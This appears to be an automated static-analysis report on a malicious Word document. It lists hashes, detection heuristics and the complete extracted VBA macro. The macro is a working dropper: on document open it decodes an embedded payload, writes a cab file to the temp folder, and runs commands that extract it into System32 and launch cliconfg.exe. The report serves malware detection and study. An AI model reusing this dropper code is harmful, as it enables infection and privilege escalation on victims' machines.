Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 86981680172bbf08…

MALICIOUS

Office (OLE)

78.5 KB Created: 2018-02-02 07:40:00 Authoring application: Microsoft Office Word First seen: 2019-01-20
MD5: 5ccfdca9b2a3628841accdedb33217fc SHA-1: 66d2cea01b46c3353f4339a986a97b24ed89ee18 SHA-256: 86981680172bbf0865e7693fe5a2bbe9b3ba12b3f1a1536ef67915daab78004c
408 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and cmd.exe, along with a Shell() call, suggesting the macros are designed to execute arbitrary commands. The presence of a Document_Open macro and the ClamAV detection as 'Doc.Dropper.Agent' strongly indicate that this document acts as a dropper for a second-stage payload.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6438391-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6438391-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        proc_query = "SELECT * FROM Win32_Processor"
        Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
        For Each info In proc_results
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
        With ActiveDocument.Content
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3636 bytes
SHA-256: 06502a1e57707972f80d60c71cd4d8855da061884b895c72e766f5a5aca9f2e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim nResult As Long
Dim sFileName As String
Dim sTempPath As String
Dim sTempFile As String
Dim cbFileBuffer As Long
Private Function debase64(InputFile As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpInBuffer
    Dim lpOutBuffer() As Byte
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    Dim nIndex, nResult As Long
    
    strKey = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv"
    
    Open InputFile For Binary As #1
        Seek #1, nOffset + 1
        lpInBuffer = Input(nCount, #1)
    Close #1
    
    ReDim lpOutBuffer(nCount) As Byte
    
    nIndex = 1
    nResult = 0
    
    Do While nIndex <= nCount
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    
    debase64 = nResult
End Function

Private Function IsWin64() As Boolean
    Dim proc_query As String
    Dim proc_results As Object
    Dim info As Object
    Dim IsWin32OrWin64 As String
    
    proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    For Each info In proc_results
        IsWin32OrWin64 = "Win" & info.AddressWidth
    Next info
    
    If IsWin32OrWin64 = "Win32" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function
Private Sub Document_Open()
    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With

    Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
        
    sFileName = ActiveDocument.FullName
    cbFileBuffer = FileLen(sFileName)
    
    If (cbFileBuffer = 81411) Then
        sTempFile = sTempPath & "\setup.cab"
        
        nResult = InStr(Application.Path, "x86")

    nResult = debase64(sFileName, 50176, 31235, sTempFile)
                
        If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
            nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        End If
    End If
End Sub